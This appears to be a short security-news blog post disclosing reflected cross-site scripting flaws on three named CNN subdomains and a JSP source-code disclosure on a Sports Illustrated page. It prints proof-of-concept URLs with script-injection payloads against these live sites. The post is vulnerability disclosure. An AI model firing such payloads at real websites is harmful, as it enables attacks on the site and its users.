Multiple XSS and JSP Source code disclosure vulnerability in CNN

Sponsored Links
An Information Security researcher has discovered multiple Cross Site scripting vulnerability that affects one of the Top News channel website, CNN.

Few days back, The vulnerability was reported by  Quister Tow. The vulnerabilities resides in three different sub domain of CNN: searchapp.cnn.com, audience.cnn.com,dynamic.si.cnn.com.

POC:

1.http://dynamic.si.cnn.com/baseball/mlb/search/mlbPlayerSearchResults.jsp?searchName=<script>alert(/QuisterTow/)</script>

2.http://searchapp.cnn.com/weboffers/weboffers.jsp?itype=cnn&cid=cnn&text=&domains=;</script><script>alert(/QuisterTow/);</script>&csiID=csi3

3.http://audience.cnn.com/services/si/flow/scoreAlertManagement?_flowExecutionKey=<script>alert(/QuisterTow/)</script>




While i was verifying the XSS vulnerabilities, i found another critical security flaw in the website that expose the source code.

POC for JSP Source Code disclosure
http://sportsillustrated.cnn.com/baseball/mlb/search/mlbPlayerSearchResults.jsp

I have immediately reported CNN about the security flaw. But there is no response from their side and so i am publishing the details here.
Category: / / / /

Share this with Your friends:


About Author

, founder of E Hacking News, an Information Security enthusiast who has more interest in PenTesting and Malware analysis. You can find him on Google+ Profile , Twitter and Facebook.